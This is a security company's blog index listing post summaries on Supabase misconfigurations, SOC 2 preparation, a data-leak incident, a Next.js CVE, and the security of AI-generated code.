Blog

Announcements, engineering, and research from the Securie team.

8 min read

The seven Supabase mistakes we see in every AI-built app

From a growing sample of publicly-reachable Supabase projects we've audited, the same seven mistakes come up every time: RLS off on at least one table, service-role key in the client, missing tenant scoping, default-allow policies, no policies on storage buckets, exposed JWT secret, and over-broad anon-role grants. Fixes for each.

supabaserlsplaybook
10 min read

How to pass your first SOC 2 as a vibe coder (six weeks, $5K, solo)

Your first enterprise prospect just sent a 200-question security questionnaire. Here is the exact playbook to pass SOC 2 Type 1 in six weeks — the policies to copy, the controls to wire up, the mistakes to avoid. Written for solo founders.

soc2compliancestartup
8 min read

Anatomy of the Moltbook hack — 1.5 million API keys in 72 hours

Moltbook leaked 1.5 million API keys, 35,000 emails, and 4,060 private messages in 72 hours. Wiz's disclosure showed the root cause: a single Supabase table without row-level security. Here is the timeline, the exact bug, and the ten-minute hardening walkthrough for your own app.

incidentsupabaserlsresearch
6 min read

CVE-2025-29927 one year later: 40% of Next.js apps still vulnerable

The Next.js middleware-bypass vulnerability was disclosed in March 2025 and patched within 24 hours. One year later, forty percent of public Next.js apps are still running vulnerable versions. Here is why, and the two-minute check to run on yours.

cvenext.jsresearch
7 min read

45% of AI-suggested code is insecure — the exact prompts that make it safer

We reran the 2025 study against Claude Opus 4.7, GPT-5.4, Gemini 2.5, and DeepSeek V3.2. The share of insecure suggestions has improved — but only when the prompt asks for security. The prompts that reliably produce safer code are short and we have them in this post.

researchai-codingprompt-engineering
7 min read

Why AI-generated code is unsafe by default

Every major study in the last twelve months has measured the same thing: 40 to 62 percent of code produced by modern AI assistants contains a real security vulnerability. Here is what that looks like in practice, and why traditional SAST tools miss most of it.

ai-securityvibe-codingresearch
5 min read

How Securie runs: the launch inference stack

A look at the three-layer model stack we ship with — Foundation-Sec local, GLM-5.1 and DeepSeek for primary reasoning, and a bounded frontier escalation layer. Why we chose it and what it costs.

engineeringmodelscost